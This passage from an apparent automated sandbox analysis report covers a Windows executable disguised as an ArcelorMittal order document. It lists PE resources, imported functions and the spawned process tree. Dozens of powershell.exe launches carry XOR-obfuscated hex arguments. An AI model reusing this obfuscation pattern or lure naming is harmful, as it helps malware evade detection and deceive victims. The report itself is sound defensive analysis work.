                                              RT_ICON0x3da9300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                              RT_ICON0x3db9d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                              RT_ICON0x3dc8800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                              RT_ICON0x3dd1280x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                              RT_ICON0x3dd7900x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                              RT_ICON0x3ddcf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                              RT_ICON0x3de1600x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                              RT_ICON0x3de4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                              RT_DIALOG0x3de5700x100dataEnglishUnited States
                                              RT_DIALOG0x3de6700xf8dataEnglishUnited States
                                              RT_DIALOG0x3de7680xa0dataEnglishUnited States
                                              RT_DIALOG0x3de8080x60dataEnglishUnited States
                                              RT_GROUP_ICON0x3de8680x84dataEnglishUnited States
                                              RT_VERSION0x3de8f00x278dataEnglishUnited States
                                              RT_MANIFEST0x3deb680x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States

                                              Imports

                                              DLLImport
                                              KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                              USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                              ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              No network behavior found

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:09:26:20
                                              Start date:05/10/2022
                                              Path:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              Imagebase:0x400000
                                              File size:152504 bytes
                                              MD5 hash:297CEE2E9339AB19CB96A073CA8BA85F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low

                                              General

                                              Target ID:1
                                              Start time:09:26:25
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6B6570CB -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:2
                                              Start time:09:26:25
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:3
                                              Start time:09:26:27
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x656C3197 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:4
                                              Start time:09:26:28
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:5
                                              Start time:09:26:29
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x3A3A41D7 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:6
                                              Start time:09:26:29
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:7
                                              Start time:09:26:32
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x656176C0 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:8
                                              Start time:09:26:32
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:9
                                              Start time:09:26:35
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x46696EC0 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:10
                                              Start time:09:26:35
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:11
                                              Start time:09:26:41
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x41286F85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:12
                                              Start time:09:26:41
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:14
                                              Start time:09:26:43
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x72342289 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:15
                                              Start time:09:26:43
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:17
                                              Start time:09:26:45
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x20692295 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:18
                                              Start time:09:26:45
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:20
                                              Start time:09:26:47
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x78383295 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:21
                                              Start time:09:26:47
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:23
                                              Start time:09:26:49
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30303295 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:24
                                              Start time:09:26:49
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:25
                                              Start time:09:26:51
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x302C22CC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:26
                                              Start time:09:26:51
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:28
                                              Start time:09:26:52
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x20302E85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:29
                                              Start time:09:26:52
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:30
                                              Start time:09:26:54
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x70203289 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:31
                                              Start time:09:26:54
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:34
                                              Start time:09:26:59
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x20692291 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:35
                                              Start time:09:26:59
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:36
                                              Start time:09:27:01
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C206B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:37
                                              Start time:09:27:01
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:38
                                              Start time:09:27:03
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30783A95 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:39
                                              Start time:09:27:03
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:42
                                              Start time:09:27:05
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C206B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:43
                                              Start time:09:27:05
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:44
                                              Start time:09:27:07
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30296B8B -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:45
                                              Start time:09:27:07
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:46
                                              Start time:09:27:08
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell.exe 0x723322FC -bxor 677
                                              Imagebase:0x7ff72dbc0000
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:47
                                              Start time:09:27:08
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:48
                                              Start time:09:27:11
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6B6570CB -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:49
                                              Start time:09:27:11
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:50
                                              Start time:09:27:12
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x656C3197 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:51
                                              Start time:09:27:13
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:52
                                              Start time:09:27:14
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x3A3A54CC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:53
                                              Start time:09:27:14
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:54
                                              Start time:09:27:16
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x727477C4 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:55
                                              Start time:09:27:16
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:56
                                              Start time:09:27:18
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6C416EC9 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:57
                                              Start time:09:27:18
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:58
                                              Start time:09:27:20
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6F632ACC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:59
                                              Start time:09:27:20
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:60
                                              Start time:09:27:21
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x302C6B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:61
                                              Start time:09:27:21
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:62
                                              Start time:09:27:23
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30783395 -bxor 677
